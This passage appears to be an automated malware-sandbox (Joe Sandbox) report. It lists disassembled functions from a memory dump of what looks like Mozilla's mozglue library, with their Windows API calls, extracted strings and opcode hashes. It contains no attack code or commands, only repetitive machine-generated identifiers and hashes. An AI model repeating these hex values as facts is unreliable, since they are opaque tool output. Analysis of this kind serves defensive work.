                                                                  • Instruction Fuzzy Hash: 7021F531701601A7CE14CBEC8854FD973F9EB46769F158528E81567F80CF32BA018AA5
                                                                  APIs
                                                                    • Part of subcall function 6C06BF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C0B7A3F), ref: 6C06BF11
                                                                    • Part of subcall function 6C06BF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C0B7A3F), ref: 6C06BF5D
                                                                    • Part of subcall function 6C06BF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C0B7A3F), ref: 6C06BF7E
                                                                  • ?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000012,00000000), ref: 6C0B7968
                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_J@Z.MSVCP140(6C0BA264,6C0BA264), ref: 6C0B799A
                                                                    • Part of subcall function 6C069830: free.MOZGLUE(?,?,?,6C0B7ABE), ref: 6C06985B
                                                                  • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C0B79E0
                                                                  • ??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6C0B79E8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
                                                                  • String ID: 3JT/
                                                                  • API String ID: 3421697164-2178588373
                                                                  • Opcode ID: 2a9a577d2aa5d1e37b01f2e76ea62e502595ad99fa0d7335a39854859767836a
                                                                  • Instruction ID: 500d84972ee630dc8d5f4cd06c2f0b77a3d2b7e13c9789a56bb12108deac207c
                                                                  • Opcode Fuzzy Hash: 2a9a577d2aa5d1e37b01f2e76ea62e502595ad99fa0d7335a39854859767836a
                                                                  • Instruction Fuzzy Hash: D52148357043049FCB14DF18D889A9EBBE5EF89314F04882DE94A87761DB30A909CB92
                                                                  APIs
                                                                    • Part of subcall function 6C06BF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C0B7A3F), ref: 6C06BF11
                                                                    • Part of subcall function 6C06BF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C0B7A3F), ref: 6C06BF5D
                                                                    • Part of subcall function 6C06BF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C0B7A3F), ref: 6C06BF7E
                                                                  • ?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000013,00000000), ref: 6C0B7A48
                                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_K@Z.MSVCP140(?,?), ref: 6C0B7A7A
                                                                    • Part of subcall function 6C069830: free.MOZGLUE(?,?,?,6C0B7ABE), ref: 6C06985B
                                                                  • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C0B7AC0
                                                                  • ??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6C0B7AC8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
                                                                  • String ID: 3JT/
                                                                  • API String ID: 3421697164-2178588373
                                                                  • Opcode ID: a8c57c5e69f11ae0cf3f1de35e386c0dcb5adf3dedf39885ef90045227cfecc5
                                                                  • Instruction ID: 708ba3f44504479dbc6f38fcf3de34e766e908ea665f5217d5a056dc74726a4d
                                                                  • Opcode Fuzzy Hash: a8c57c5e69f11ae0cf3f1de35e386c0dcb5adf3dedf39885ef90045227cfecc5
                                                                  • Instruction Fuzzy Hash: E32148357043049FCB14DF18D889A9EBBE5EF89314F00882CE94A87761DB30A909CBD2
                                                                  APIs
                                                                  • SearchPathW.KERNEL32(?,6C07BFBD,.dll,00000000,00000000,00000000,6C07BFBD), ref: 6C0BABBD
                                                                  • moz_xmalloc.MOZGLUE(00000001), ref: 6C0BABD8
                                                                    • Part of subcall function 6C06CA10: malloc.MOZGLUE(?), ref: 6C06CA26
                                                                  • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C0BABEB
                                                                  • SearchPathW.KERNEL32(?,?,.dll,00000001,?,00000000), ref: 6C0BAC03
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: PathSearch$mallocmemsetmoz_xmalloc
                                                                  • String ID: .dll
                                                                  • API String ID: 3063185715-2738580789
                                                                  • Opcode ID: 59258acc20653c33d00786034bd4aed26ecc8e812f3119b1f8b2ff18c54ea447
                                                                  • Instruction ID: fe53eeaa27577f3d3f749472e140c41403ccecc583074db1e882c2d4af841fc2
                                                                  • Opcode Fuzzy Hash: 59258acc20653c33d00786034bd4aed26ecc8e812f3119b1f8b2ff18c54ea447
                                                                  • Instruction Fuzzy Hash: BC0192B2A0021A6FEB019FB4CC45BBFB6EDEF85254F150435FD09E3600E676AD5487A2
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0BAAF8
                                                                  • EnterCriticalSection.KERNEL32(6C0DF770,?,6C07BF9F), ref: 6C0BAB08
                                                                  • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,6C07BF9F), ref: 6C0BAB39
                                                                  • LeaveCriticalSection.KERNEL32(6C0DF770,?,?,?,?,?,?,?,?,6C07BF9F), ref: 6C0BAB6B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$CurrentEnterLeaveThread_stricmp
                                                                  • String ID: 3JT/
                                                                  • API String ID: 1951318356-2178588373
                                                                  • Opcode ID: 558e152e02a1f7bbcb5543d899094cdb1b503f4827de38dd6b87d26756ca353c
                                                                  • Instruction ID: 7087d5f3e3b940d515a31ca9399bfe433aeb02109598de1fa600f2d8513222bf
                                                                  • Opcode Fuzzy Hash: 558e152e02a1f7bbcb5543d899094cdb1b503f4827de38dd6b87d26756ca353c
                                                                  • Instruction Fuzzy Hash: 301130B1A0020A9FCF00DFA8D8849DBBBF9EF493057054429E905A7301EB35F909CBA1
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(shell32,?,6C0CD020), ref: 6C05F122
                                                                  • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C05F132
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: SHGetKnownFolderPath$shell32$3JT/
                                                                  • API String ID: 2574300362-2010352506
                                                                  • Opcode ID: f4cf5d9f05c8767f4573d3924942c9eda07b013d79fc66a1d24778e68b59f5c3
                                                                  • Instruction ID: 83705565f60741235bcc4b7a787aeb251383b5860f5edf80b4df31b6d565a62e
                                                                  • Opcode Fuzzy Hash: f4cf5d9f05c8767f4573d3924942c9eda07b013d79fc66a1d24778e68b59f5c3
                                                                  • Instruction Fuzzy Hash: 17014C717012169BCF009F65DD48B5A7BFCEF4AA55B414518ED49D7600DB30AA00CBA0
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09E577
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09E584
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09E5DE
                                                                  • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C09E8A6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
                                                                  • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$3JT/
                                                                  • API String ID: 1483687287-3672379104
                                                                  • Opcode ID: bd63f113d84407994a1ef66cbe92ffa42d4d05fbd3d70dae3ca6422b9e0a44ca
                                                                  • Instruction ID: 6acd403845ff1a749acb0bbeb6f6716f2c6f68434fdf487c6977df54eed2b0d4
                                                                  • Opcode Fuzzy Hash: bd63f113d84407994a1ef66cbe92ffa42d4d05fbd3d70dae3ca6422b9e0a44ca
                                                                  • Instruction Fuzzy Hash: 6611AD31A04358DFCB009F54C848B6ABBF8FB89329F058619EC5647650DB70B805CB91
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6C0DF770,-00000001,?,6C0CE330,?,6C07BDF7), ref: 6C0BA7AF
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6C07BDF7), ref: 6C0BA7C2
                                                                  • moz_xmalloc.MOZGLUE(00000018,?,6C07BDF7), ref: 6C0BA7E4
                                                                  • LeaveCriticalSection.KERNEL32(6C0DF770), ref: 6C0BA80A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
                                                                  • String ID: accelerator.dll
                                                                  • API String ID: 2442272132-2426294810
                                                                  • Opcode ID: ac1ad45158954ea42ef9fe8676cdbb901ec1b8fcadd26de7e4855b7179fb9fe0
                                                                  • Instruction ID: 89eba6c14be7c6cff978f5ca64bc3470ab603368f3bbb3a4463a3569c62a401a
                                                                  • Opcode Fuzzy Hash: ac1ad45158954ea42ef9fe8676cdbb901ec1b8fcadd26de7e4855b7179fb9fe0
                                                                  • Instruction Fuzzy Hash: 61018BB06043049FDB04DF5AD884E9577F8FB8A315719806AEC09CB711DB71BA00CBA1
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(ole32,?,6C05EE51,?), ref: 6C05F0B2
                                                                  • GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 6C05F0C2
                                                                  Strings
                                                                  • Could not load ole32 - will not free with CoTaskMemFree, xrefs: 6C05F0DC
                                                                  • ole32, xrefs: 6C05F0AD
                                                                  • Could not find CoTaskMemFree, xrefs: 6C05F0E3
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
                                                                  • API String ID: 2574300362-1578401391
                                                                  • Opcode ID: 0111d278dc8e545bb1726a917a4d014f23781836cd555a9bb532824cf675f651
                                                                  • Instruction ID: 8cfcb4548d071a1017513e059680e4b5259911244dc77916a82460dcd50602e7
                                                                  • Opcode Fuzzy Hash: 0111d278dc8e545bb1726a917a4d014f23781836cd555a9bb532824cf675f651
                                                                  • Instruction Fuzzy Hash: E6E048747853029BEF045AA6990873637FD5B166197589929FA06D2E40EE25F420C611
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(user32.dll,?,?,6C06434E), ref: 6C0B73EB
                                                                  • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwarenessContext), ref: 6C0B7404
                                                                  • FreeLibrary.KERNEL32(?,?,6C06434E), ref: 6C0B7413
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadProc
                                                                  • String ID: SetProcessDpiAwarenessContext$user32.dll
                                                                  • API String ID: 145871493-397433131
                                                                  • Opcode ID: d0d66f6fbfcfbc29cfe6fddf375b72e08eb1e634b62ec448d022de3380f3d821
                                                                  • Instruction ID: 0d62306687e304d881ca88ee064c65712c4a1f069ec9b8f95f626c7d9ae33ddf
                                                                  • Opcode Fuzzy Hash: d0d66f6fbfcfbc29cfe6fddf375b72e08eb1e634b62ec448d022de3380f3d821
                                                                  • Instruction Fuzzy Hash: FFE0BF742017129BE7105FA9D918746FFFCEB05656F108C2AEE89E3B11EFB1E8408B51
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(wintrust.dll,?,6C067204), ref: 6C090088
                                                                  • GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext2), ref: 6C0900A7
                                                                  • FreeLibrary.KERNEL32(?,6C067204), ref: 6C0900BE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadProc
                                                                  • String ID: CryptCATAdminAcquireContext2$wintrust.dll
                                                                  • API String ID: 145871493-3385133079
                                                                  • Opcode ID: 0f59ef858fbc5ae50059bbded58e7504473e1e99aaf7622519fc983db64d47b3
                                                                  • Instruction ID: 65226f9baf52b031ce6978ab623f5db85257f84ba9e19bca192de4677fa8527b
                                                                  • Opcode Fuzzy Hash: 0f59ef858fbc5ae50059bbded58e7504473e1e99aaf7622519fc983db64d47b3
                                                                  • Instruction Fuzzy Hash: 6BE09274644346ABEF00AF6698087057AFCAB4B789F608426AD14C3650DFB4F080EB12
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(wintrust.dll,?,6C067235), ref: 6C0900D8
                                                                  • GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6C0900F7
                                                                  • FreeLibrary.KERNEL32(?,6C067235), ref: 6C09010E
                                                                  Strings
                                                                  • CryptCATAdminCalcHashFromFileHandle2, xrefs: 6C0900F1
                                                                  • wintrust.dll, xrefs: 6C0900D3
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadProc
                                                                  • String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
                                                                  • API String ID: 145871493-2559046807
                                                                  • Opcode ID: 77ad9c92268b7bff7ad81971b406771a100625a252f50016742200c9b05e793f
                                                                  • Instruction ID: a9270ca75e44bf8bf29d8bd26c46db716456aa52706f2092fa9464b6b70e8019
                                                                  • Opcode Fuzzy Hash: 77ad9c92268b7bff7ad81971b406771a100625a252f50016742200c9b05e793f
                                                                  • Instruction Fuzzy Hash: 2BE092746493069BEF009F6589097357AFDA70AA49F50D42AAD4A82A40DFB0B180EE12
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(wintrust.dll,?,6C067297), ref: 6C090128
                                                                  • GetProcAddress.KERNEL32(00000000,CryptCATAdminEnumCatalogFromHash), ref: 6C090147
                                                                  • FreeLibrary.KERNEL32(?,6C067297), ref: 6C09015E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadProc
                                                                  • String ID: CryptCATAdminEnumCatalogFromHash$wintrust.dll
                                                                  • API String ID: 145871493-1536241729
                                                                  • Opcode ID: 669edc30d3b1cf8654c049ca9ed2c34f3ff3ce5a6df5d03c37a807a45e6c3a2d
                                                                  • Instruction ID: d4c304a8a499b7586ebd8394e47fe05496a8b20a50d50908422d8c7189c749b7
                                                                  • Opcode Fuzzy Hash: 669edc30d3b1cf8654c049ca9ed2c34f3ff3ce5a6df5d03c37a807a45e6c3a2d
                                                                  • Instruction Fuzzy Hash: BAE092756493869BEF006F6AD8087167AFCA74BB49F108526BE09C7740DFB0F080EB56
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(wintrust.dll,?,6C067308), ref: 6C090178
                                                                  • GetProcAddress.KERNEL32(00000000,CryptCATCatalogInfoFromContext), ref: 6C090197
                                                                  • FreeLibrary.KERNEL32(?,6C067308), ref: 6C0901AE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadProc
                                                                  • String ID: CryptCATCatalogInfoFromContext$wintrust.dll
                                                                  • API String ID: 145871493-3354427110
                                                                  • Opcode ID: 21be1eb65d98a6253e9f2d4aaf1fee3c86bcbdd79c9f3ca9840d3b13143ffa4c
                                                                  • Instruction ID: 1077ba30f17328908306e349e7ec143ec6c1aa773dce6a8049b99e214d3fa963
                                                                  • Opcode Fuzzy Hash: 21be1eb65d98a6253e9f2d4aaf1fee3c86bcbdd79c9f3ca9840d3b13143ffa4c
                                                                  • Instruction Fuzzy Hash: 2BE092747863069BEF405F65C908B057BFCB70AB49F508466EE8582780DFB4A080EA22
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(wintrust.dll,?,6C067266), ref: 6C0901C8
                                                                  • GetProcAddress.KERNEL32(00000000,CryptCATAdminReleaseContext), ref: 6C0901E7
                                                                  • FreeLibrary.KERNEL32(?,6C067266), ref: 6C0901FE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadProc
                                                                  • String ID: CryptCATAdminReleaseContext$wintrust.dll
                                                                  • API String ID: 145871493-1489773717
                                                                  • Opcode ID: e906bf25727f351050307994cdbac0cb469e486848de86dec026f0d3957e5f83
                                                                  • Instruction ID: be6d4b00b3508a5a143fb65f984f5deb6d3637aa0ed69884b11749081594f92e
                                                                  • Opcode Fuzzy Hash: e906bf25727f351050307994cdbac0cb469e486848de86dec026f0d3957e5f83
                                                                  • Instruction Fuzzy Hash: F3E0BF746843869FEF005F65C8087067AFCEB07749F508415EE05C6680DFB1E040EF12
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(ntdll.dll,?,6C0B748B,?), ref: 6C0B75B8
                                                                  • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C0B75D7
                                                                  • FreeLibrary.KERNEL32(?,6C0B748B,?), ref: 6C0B75EC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadProc
                                                                  • String ID: RtlNtStatusToDosError$ntdll.dll
                                                                  • API String ID: 145871493-3641475894
                                                                  • Opcode ID: 6736c98f31df282230acfb41f7cab7cce4d4eb9320af0497a324b989d2637212
                                                                  • Instruction ID: 44e02dbc5bb951e776f556137d1f30a88e8ed72390600c8d9406f86d7e762406
                                                                  • Opcode Fuzzy Hash: 6736c98f31df282230acfb41f7cab7cce4d4eb9320af0497a324b989d2637212
                                                                  • Instruction Fuzzy Hash: 1BE0B675604302BBEF00AFE6C9487817AFCEB06219F10C425ED19D6640EFB1B242EF10
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(ntdll.dll,?,6C0B7592), ref: 6C0B7608
                                                                  • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C0B7627
                                                                  • FreeLibrary.KERNEL32(?,6C0B7592), ref: 6C0B763C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
